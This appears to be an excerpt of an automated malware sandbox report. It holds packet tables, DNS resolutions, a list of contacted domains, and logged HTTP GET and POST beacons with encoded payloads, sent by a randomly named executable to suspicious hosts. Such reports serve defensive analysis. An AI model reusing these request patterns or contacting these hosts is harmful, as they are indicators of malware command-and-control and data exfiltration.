Oct 8, 2024 15:39:11.019216061 CEST  80           49992      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:11.019411087 CEST  49992        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:11.582400084 CEST  49992        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:12.603372097 CEST  49993        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:12.608428955 CEST  80           49993      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:12.611411095 CEST  49993        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:12.623302937 CEST  49993        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:12.629324913 CEST  80           49993      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:13.569960117 CEST  80           49993      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:13.570725918 CEST  80           49993      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:13.570785999 CEST  49993        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:14.131300926 CEST  49993        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:15.149457932 CEST  49994        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:15.154611111 CEST  80           49994      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:15.154727936 CEST  49994        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:15.170475006 CEST  49994        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:15.175724030 CEST  80           49994      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:15.175734997 CEST  80           49994      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:16.103693962 CEST  80           49994      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:16.163311005 CEST  49994        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:16.338438034 CEST  80           49994      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:16.338550091 CEST  49994        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:16.677117109 CEST  49994        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:17.694920063 CEST  49995        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:17.700141907 CEST  80           49995      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:17.701370955 CEST  49995        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:17.710258961 CEST  49995        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:17.715430021 CEST  80           49995      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:18.594732046 CEST  80           49995      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:18.594844103 CEST  80           49995      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:18.595077038 CEST  49995        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:18.597939014 CEST  49995        80         192.168.2.5      38.47.232.196
Oct 8, 2024 15:39:18.602873087 CEST  80           49995      38.47.232.196    192.168.2.5
Oct 8, 2024 15:39:23.616301060 CEST  49996        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:23.621253014 CEST  80           49996      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:23.621400118 CEST  49996        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:23.631701946 CEST  49996        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:23.636539936 CEST  80           49996      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:25.030827999 CEST  80           49996      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:25.036233902 CEST  49996        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:25.144860983 CEST  49996        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:25.150074005 CEST  80           49996      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:26.163541079 CEST  49997        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:26.168776989 CEST  80           49997      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:26.168942928 CEST  49997        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:26.181380033 CEST  49997        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:26.186332941 CEST  80           49997      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:26.656060934 CEST  80           49997      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:26.658843040 CEST  49997        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:27.691756964 CEST  49997        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:27.750500917 CEST  80           49997      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:28.711332083 CEST  49998        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:28.716604948 CEST  80           49998      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:28.718571901 CEST  49998        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:28.729100943 CEST  49998        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:28.734138012 CEST  80           49998      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:28.734177113 CEST  80           49998      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:29.175199032 CEST  80           49998      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:29.175266981 CEST  49998        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:30.238739967 CEST  49998        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:30.243777990 CEST  80           49998      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:31.258181095 CEST  49999        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:31.341442108 CEST  80           49999      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:31.341526031 CEST  49999        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:31.349512100 CEST  49999        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:31.354352951 CEST  80           49999      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:34.810785055 CEST  80           49999      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:34.811289072 CEST  80           49999      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:34.811433077 CEST  49999        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:34.815423965 CEST  49999        80         192.168.2.5      3.33.130.190
Oct 8, 2024 15:39:34.820341110 CEST  80           49999      3.33.130.190     192.168.2.5
Oct 8, 2024 15:39:40.255337000 CEST  50000        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:40.260344982 CEST  80           50000      154.212.219.2    192.168.2.5
Oct 8, 2024 15:39:40.267338037 CEST  50000        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:40.275346994 CEST  50000        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:40.280635118 CEST  80           50000      154.212.219.2    192.168.2.5
Oct 8, 2024 15:39:41.167471886 CEST  80           50000      154.212.219.2    192.168.2.5
Oct 8, 2024 15:39:41.167943954 CEST  80           50000      154.212.219.2    192.168.2.5
Oct 8, 2024 15:39:41.168001890 CEST  50000        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:41.785490036 CEST  50000        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:42.815139055 CEST  50001        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:42.820400000 CEST  80           50001      154.212.219.2    192.168.2.5
Oct 8, 2024 15:39:42.823626995 CEST  50001        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:42.835398912 CEST  50001        80         192.168.2.5      154.212.219.2
Oct 8, 2024 15:39:42.840466976 CEST  80           50001      154.212.219.2    192.168.2.5
Oct 8, 2024 15:39:43.739476919 CEST  80           50001      154.212.219.2    192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:43.739681005 CEST8050001154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:43.739751101 CEST5000180192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:44.347985983 CEST5000180192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:45.367101908 CEST5000280192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:45.372149944 CEST8050002154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:45.372256994 CEST5000280192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:45.384706974 CEST5000280192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:45.389988899 CEST8050002154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:45.390141010 CEST8050002154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:46.306776047 CEST8050002154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:46.492176056 CEST8050002154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:46.492376089 CEST5000280192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:46.498815060 CEST8050002154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:46.499032974 CEST5000280192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:46.895380020 CEST5000280192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:47.914372921 CEST5000380192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:47.919255018 CEST8050003154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:47.919326067 CEST5000380192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:47.928237915 CEST5000380192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:47.933443069 CEST8050003154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:48.798584938 CEST8050003154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:48.798871040 CEST8050003154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:48.799062967 CEST5000380192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:48.802697897 CEST5000380192.168.2.5154.212.219.2
                                                                                                                  Oct 8, 2024 15:39:48.807651997 CEST8050003154.212.219.2192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:55.160010099 CEST5000480192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:55.165139914 CEST8050004133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:55.165203094 CEST5000480192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:55.177587986 CEST5000480192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:55.182337999 CEST8050004133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:55.957986116 CEST8050004133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:55.958477974 CEST8050004133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:55.958586931 CEST5000480192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:56.691847086 CEST5000480192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:57.711247921 CEST5000580192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:57.716358900 CEST8050005133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:57.716442108 CEST5000580192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:57.730890989 CEST5000580192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:57.736361980 CEST8050005133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:58.520190954 CEST8050005133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:58.520204067 CEST8050005133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:58.520598888 CEST8050005133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:58.521481991 CEST5000580192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:39:59.238662958 CEST5000580192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:00.257199049 CEST5000680192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:00.262181997 CEST8050006133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:00.265464067 CEST5000680192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:00.275993109 CEST5000680192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:00.281203985 CEST8050006133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:00.281241894 CEST8050006133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:01.304867029 CEST8050006133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:01.304886103 CEST8050006133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:01.304935932 CEST5000680192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:01.305288076 CEST8050006133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:01.305324078 CEST5000680192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:01.785533905 CEST5000680192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:02.807369947 CEST5000780192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:02.812217951 CEST8050007133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:02.814353943 CEST5000780192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:02.827182055 CEST5000780192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:02.832109928 CEST8050007133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:03.615032911 CEST8050007133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:03.615571022 CEST8050007133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:03.615614891 CEST5000780192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:03.619144917 CEST5000780192.168.2.5133.130.35.90
                                                                                                                  Oct 8, 2024 15:40:03.627367020 CEST8050007133.130.35.90192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:08.787378073 CEST5000880192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:08.792464018 CEST80500083.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:08.795439005 CEST5000880192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:08.807380915 CEST5000880192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:08.812597990 CEST80500083.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:09.260416985 CEST80500083.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:09.260479927 CEST5000880192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:10.316757917 CEST5000880192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:10.324466944 CEST80500083.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:11.337131023 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:12.381434917 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:12.735879898 CEST80500093.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:12.736936092 CEST80500093.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:12.739500999 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:12.751411915 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:12.752774000 CEST80500093.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:12.755553007 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:12.758117914 CEST80500093.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:13.226075888 CEST80500093.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:13.226134062 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:14.259407043 CEST5000980192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:14.370898008 CEST80500093.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:15.279822111 CEST5001080192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:15.284852982 CEST80500103.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:15.284921885 CEST5001080192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:15.297725916 CEST5001080192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:15.302712917 CEST80500103.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:15.302773952 CEST80500103.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:15.751684904 CEST80500103.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:15.751746893 CEST5001080192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:16.801176071 CEST5001080192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:16.806369066 CEST80500103.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:17.820552111 CEST5001180192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:17.825618029 CEST80500113.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:17.825695038 CEST5001180192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:17.834502935 CEST5001180192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:17.839329958 CEST80500113.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:18.282660961 CEST80500113.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:18.283066988 CEST80500113.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:18.283402920 CEST5001180192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:18.286372900 CEST5001180192.168.2.53.33.130.190
                                                                                                                  Oct 8, 2024 15:40:18.291451931 CEST80500113.33.130.190192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:24.268099070 CEST5001280192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:24.273509026 CEST8050012172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:24.273704052 CEST5001280192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:24.286417007 CEST5001280192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:24.291311979 CEST8050012172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:24.763355970 CEST8050012172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:24.764632940 CEST8050012172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:24.764708042 CEST5001280192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:25.785569906 CEST5001280192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:26.805767059 CEST5001380192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:26.810745001 CEST8050013172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:26.810863972 CEST5001380192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:26.823380947 CEST5001380192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:26.830147982 CEST8050013172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:27.311445951 CEST8050013172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:27.311800957 CEST8050013172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:27.311872005 CEST5001380192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:28.333472967 CEST5001380192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:29.352989912 CEST5001480192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:29.358149052 CEST8050014172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:29.358233929 CEST5001480192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:29.380522013 CEST5001480192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:29.385740042 CEST8050014172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:29.385771990 CEST8050014172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:29.819581985 CEST8050014172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:29.819688082 CEST8050014172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:29.819751978 CEST5001480192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:30.895025015 CEST5001480192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:31.915312052 CEST5001580192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:31.920547009 CEST8050015172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:31.920624971 CEST5001580192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:31.927400112 CEST5001580192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:31.932327986 CEST8050015172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:32.437335968 CEST8050015172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:32.455566883 CEST8050015172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:32.455734968 CEST5001580192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:32.456628084 CEST5001580192.168.2.5172.191.244.62
                                                                                                                  Oct 8, 2024 15:40:32.461885929 CEST8050015172.191.244.62192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:37.493948936 CEST5001680192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:37.499100924 CEST8050016162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:37.499181986 CEST5001680192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:37.511646032 CEST5001680192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:37.519073963 CEST8050016162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:38.306790113 CEST8050016162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:38.306807995 CEST8050016162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:38.306821108 CEST8050016162.241.244.106192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                  Oct 8, 2024 15:39:55.156999111 CEST1.1.1.1192.168.2.50x7452No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:55.157015085 CEST1.1.1.1192.168.2.50x7452No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:55.157015085 CEST1.1.1.1192.168.2.50x7452No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST1.1.1.1192.168.2.50xf50eNo error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST1.1.1.1192.168.2.50xf50eNo error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST1.1.1.1192.168.2.50xf50eNo error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:24.262759924 CEST1.1.1.1192.168.2.50x8173No error (0)www.lurknlarkk.xyzredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:24.262759924 CEST1.1.1.1192.168.2.50x8173No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:37.490845919 CEST1.1.1.1192.168.2.50x1601No error (0)www.mommymode.sitemommymode.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:37.490845919 CEST1.1.1.1192.168.2.50x1601No error (0)mommymode.site162.241.244.106A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:56.035773993 CEST1.1.1.1192.168.2.50xd836No error (0)www.polarmuseum.info199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:41:09.203517914 CEST1.1.1.1192.168.2.50x45e8Name error (3)wwwnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:41:15.803016901 CEST1.1.1.1192.168.2.50xd079Name error (3)wwwnonenoneA (IP address)IN (0x0001)false
• www.newdaydawning.net
• www.40wxd.top
• www.uburn.xyz
• www.o731lh.vip
• www.nakama2-sshl.xyz
• www.zz82x.top
• www.tukaari.shop
• www.prj81oqde1.buzz
• www.komart.shop
• www.healthyloveforall.net
• www.lurknlarkk.xyz
• www.mommymode.site
• www.polarmuseum.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49863 | 44.213.25.70 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:37:50.352426052 CEST | 475 | OUT
GET /7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.newdaydawning.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 8, 2024 15:37:51.485133886 CEST | 489 | IN
HTTP/1.1 301 Moved Permanently
Date: Tue, 08 Oct 2024 13:37:50 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA==
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Oct 8, 2024 15:37:51.503470898 CEST | 5 | IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49956 | 206.119.82.134 | 80 | 4568 | C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:38:07.089812040 CEST | 712 | OUT
POST /l8if/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.40wxd.top
Origin: http://www.40wxd.top
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Referer: http://www.40wxd.top/l8if/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 39 59 71 37 77 6b 54 62 62 75 39 74 30 49 46 56 4c 43 36 7a 76 31 69 49 6c 6a 56 59 4e 4b 50 2b 54 46 56 39 67 34 3d
Data Ascii: nV=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm39Yq7wkTbbu9t0IFVLC6zv1iIljVYNKP+TFV9g4=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
